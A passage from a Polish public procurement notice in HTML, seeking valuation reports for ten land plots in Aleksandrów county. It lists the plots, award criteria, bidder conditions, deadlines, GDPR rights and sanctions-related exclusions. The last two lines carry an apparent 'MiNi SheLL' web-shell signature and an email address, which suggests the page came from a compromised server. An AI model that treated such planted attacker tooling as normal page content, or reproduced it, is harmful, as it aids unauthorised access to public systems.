publicznej.<br/>5.	Działka nr 334 powierzchnia 0,0235 ha, obręb Podgaj, gmina Aleksandrów Kujawski, powiat aleksandrowski. Charakterystyka nieruchomości – rolna niezabudowana, Działka w kompleksie gruntów rolnych ma regularny kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej.<br/>6.	Działka nr 93/3 powierzchnia 0,0209 ha, obręb Włoszyca gmina Waganiec powiat aleksandrowski. Charakterystyka nieruchomości – niezabudowana, kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej, tereny turystyczno-letniskowe<br/>7.	Działki nr 93/5 i 93/6 o łącznej powierzchni powierzchnia 0,4188 ha, obręb Włoszyca gmina Waganiec powiat aleksandrowski. Charakterystyka nieruchomości – niezabudowana, kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej, tereny turystyczno-letniskowe.<br/>8.	Działka nr 3/5 powierzchnia 0,2703 ha, obręb Kamieniec gmina Koneck powiat aleksandrowski. Charakterystyka nieruchomości – rolna niezabudowana, Działka w kompleksie gruntów rolnych ma regularny kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej.<br/>9.	Działka nr 3/4 powierzchnia 0,3754 ha, obręb Kamieniec gmina Koneck powiat aleksandrowski. Charakterystyka nieruchomości –rolna niezabudowana, Działka w kompleksie gruntów rolnych ma regularny kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej .<br/>10.	Działka nr 4/2 powierzchnia 1,2646 ha, obręb Kamieniec gmina Koneck powiat aleksandrowski. Charakterystyka nieruchomości – niezabudowana, Działka położona na terenie lasów, kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej.<br/>Wykonanie – 10 operatów szacunkowych w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	WARUNKI UDZIAŁU W POSTĘPOWANIU<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>z postępowania oraz którzy spełniają poniższe warunki zamówienia: <br/>a)	w zakresie zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunku w tym zakresie;<br/>b)	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej - Zamawiający nie stawia warunku w tym zakresie;<br/>c)	w zakresie sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunku w tym zakresie;<br/>d)	w zakresie zdolności technicznej lub zawodowej – dysponują do realizacji zamówienia minimum 1 osobą posiadającą świadectwo nadania uprawnień zawodowych w zakresie szacowania nieruchomości - zgodnie z art. 156 ust. 1 ustawy o gospodarce nieruchomościami rzeczoznawca majątkowy sporządza na piśmie opinię o wartości nieruchomości w formie operatu szacunkowego.<br/>2.	OCENA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTEPOWANIU<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie, wg formuły spełnia/ nie spełnia, na podstawie:<br/>a)	załączonego do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu, złożonego zgodnie z art. 125 ust. 1 ustawy Pzp - wzór oświadczenia stanowi załącznik nr 3 do SWZ<br/>oraz na podstawie:<br/>b)	podmiotowego środka dowodowego w postaci wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami – do złożenia którego zostanie wezwany Wykonawca, którego oferta zostanie oceniona najwyżej,<br/>Z uwagi na fakt, iż doświadczenie rzeczoznawcy, którego Wykonawca wskaże do realizacji zadania, jest jednym z kryteriów oceny ofert, Zamawiający wymaga wskazania w ofercie imienia i nazwiska rzeczoznawcy, skierowanego do wykonania zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	PEŁNOMOCNICTWO <br/>1.1.	Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa, obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>1.2.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć do oferty. <br/>1.3.	W przypadku spółki cywilnej dokumentami zastępującymi pełnomocnictwo mogą być umowa spółki lub uchwała wspólników, wskazujące jednego ze wspólników jako umocowanego do reprezentacji spółki (wszystkich wspólników).<br/>1.4.	Forma umocowania została szczegółowo określona w Specyfikacji Warunków Zamówienia<br/><br/>2.	OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA<br/>2.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji, Wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>2.2. Wzór oświadczenia stanowi załącznik do SWZ	<br/>2.3. Forma oświadczenia została szczegółowo określona w Specyfikacji Warunków Zamówienia <br/><br/>3.	ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO SWOJE ZASOBY<br/>3.1. W przypadku polegania na zasobach podmiotu udostępniającego swoje zasoby, Wykonawca wraz z ofertą składa zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący Wykonawcę <br/>z podmiotami udostępniającymi zasoby, gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>3.2. Wzór zobowiązania stanowi załącznik nr SWZ<br/>3.3. Forma zobowiązania została szczegółowo określona w Specyfikacji Warunków Zamówienia.<br/><br/>4.	OŚWIADCZENIE NT. DOŚWIADCZENIA RZECZOZNAWCY<br/>4.1. Z uwagi na fakt, iż doświadczenie rzeczoznawcy, którego Wykonawca wskaże do realizacji zadania, jest jednym z kryteriów oceny ofert, Zamawiający wymaga wskazania w ofercie imienia i nazwiska rzeczoznawcy, skierowanego do wykonania zamówienia<br/>4.2. Celem uzyskania punktów w kryterium JAKOŚĆ-DOŚWIADCZENIE RZECZOZNAWCY – Wykonawca wraz z ofertą składa oświadczenie nt. wykonanych, w okresie ostatnich 3 lat przed terminem składania ofert, przez Rzeczoznawcę, skierowanego do realizacji zamówienia, operatów szacunkowych, przygotowane zgodnie z wzorem stanowiącym załącznik do SWZ, <br/>4.3.	Forma oświadczenia została szczegółowo określona w Specyfikacji Warunków Zamówienia. <br/>4.4.	Zamawiający zastrzega, że przedmiotowe oświadczenie NIE PODLEGA UZUPEŁNIENIU <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (m.in. konsorcjum, spółka cywilna). W takim przypadku:<br/>a)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>b)	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>c)	Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z Wykonawców składa wraz z ofertą oświadczenie, o których mowa w art. 125 ust 1 ustawy Pzp. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy stanowią załącznik nr 2 do SWZ. <br/>2.	Złożenie oferty jest jednoznaczne z akceptacją przez Wykonawcę projektowanych postanowień umowy.<br/>3.	Zamawiający dopuszcza możliwość zmian w umowie w zakresie przedłużenia terminu wykonania zamówienia, tylko i wyłącznie w przypadku:<br/>-	wystąpienia siły wyższej, przez którą należy rozumieć wystąpienie zdarzeń i okoliczności, na które Strony umowy nie mają wpływu, przed którymi, działając z należytą starannością, Strony umowy nie mogły się zabezpieczyć i które wystąpiły po zawarciu umowy (np. pożar, powódź, zalanie, klęska żywiołowa, epidemia). <br/>4.	Zmiany treści umowy mogą nastąpić wyłącznie na pisemny, udokumentowany wniosek WYKONAWCY, który uzyska pozytywną opinię ZAMAWIAJĄCEGO, potwierdzającą jego zasadność. Wniosek powinien być złożony niezwłocznie po zaistnieniu okoliczności, uniemożliwiających terminową realizację prac. Zamawiający zastrzega jednak, że maksymalny okres przesunięcia terminu zakończenia usługi będzie równy okresowi przerwy, na który Wykonawca nie miał wpływu. <br/>5.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności<br/>6.	W przypadku wystąpienia okoliczności nieprzewidzianych, opisanych w art. 455 ustawy Prawo zamówień publicznych zmiany niniejszej umowy mogą nastąpić tylko na zasadach określonych w przywołanym artykule. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem Platformy zakupowej eB2b pod adresem: https://kowr.eb2b.com.pl/open-preview-auction.html/399574 przy użyciu zakładki „Załączniki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Ciąg dalszy informacji RODO (…) <br/>7.	PRAWA OSÓB, KTÓRYCH DANE DOTYCZĄ<br/>Zgodnie z RODO przysługuje Pani/Panu:<br/>1)	prawo dostępu do swoich danych oraz otrzymania ich kopii; <br/>2)	prawo do sprostowania (poprawiania) swoich danych; <br/>3)	prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; <br/>4)	prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa.<br/>Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany <br/>w pkt 1.<br/>Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. <br/>8.	ZAUTOMATYZOWANE PODEJMOWANIE DECYZJI<br/>W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. <br/>9.	PRZEKAZYWANIE DANYCH POZA EUROPEJSKI OBSZAR GOSPODARCZY<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj. państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4<br/>II. Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (zwanej dalej ustawą) z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1. wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 przywołanej ustawy.<br/>2. wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593, 655, 835, 2180 i 2185) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 przywołanej ustawy,<br/>3. wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106 oraz z 2022 r. poz. 1488) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 przywołanej ustawy

Creat By MiNi SheLL
Email: jattceo@gmail.com